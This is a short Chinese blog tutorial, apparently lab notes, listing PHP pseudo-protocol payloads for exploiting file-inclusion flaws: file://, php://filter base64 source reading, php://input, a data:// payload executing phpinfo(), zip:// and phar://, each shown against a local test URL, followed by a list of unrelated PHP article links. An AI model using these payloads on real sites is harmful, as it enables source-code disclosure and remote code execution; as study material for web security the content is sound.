文件包含PHP伪协议利用方法

你不要在理我了2024-09-04 8:01

一.file://

使⽤: file:// ⽂件的绝对路径和⽂件名

123.php?cmd=file://D:\xuexi\xiaopi\phpstudy_pro\www\123.txt

二.php://filter

123.php?cmd=php://filter/read=convert.base64-encode/resource=1.php

三.php://input

步骤一:123.php?cmd=php://input抓包

步骤二,右键修改请求方法,修改数据包

步骤三,放行访问

四.data://

⽤途:数据( RFC2397 )

123.php?cmd=data:text/plain,<?php phpinfo();?>

五.zip://

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)

123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt

六.phar://

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)

123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt

相关推荐
ServBay17 小时前
告别面条代码,PSL 5.0 重构 PHP 性能与安全天花板
后端·php
JaguarJack3 天前
FrankenPHP 原生支持 Windows 了
后端·php·服务端
BingoGo3 天前
FrankenPHP 原生支持 Windows 了
后端·php
JaguarJack4 天前
PHP 的异步编程 该怎么选择
后端·php·服务端
BingoGo4 天前
PHP 的异步编程 该怎么选择
后端·php
JaguarJack5 天前
为什么 PHP 闭包要加 static?
后端·php·服务端
ServBay6 天前
垃圾堆里编码?真的不要怪 PHP 不行
后端·php
用户962377954486 天前
CTF 伪协议
php
BingoGo8 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php
JaguarJack8 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php·服务端
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录04本地部署 OpenClaw + DeepSeek-R1 完全指南05Window 10部署openclaw报错node.exe : npm error code 12806OpenClaw + 飞书(Feishu)环境搭建指南07npm-error code 128问题解决方法08OpenClaw 接入 QQ Bot 完整实践指南09OpenClaw 飞书机器人不回复消息?3 小时踩坑总结10Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤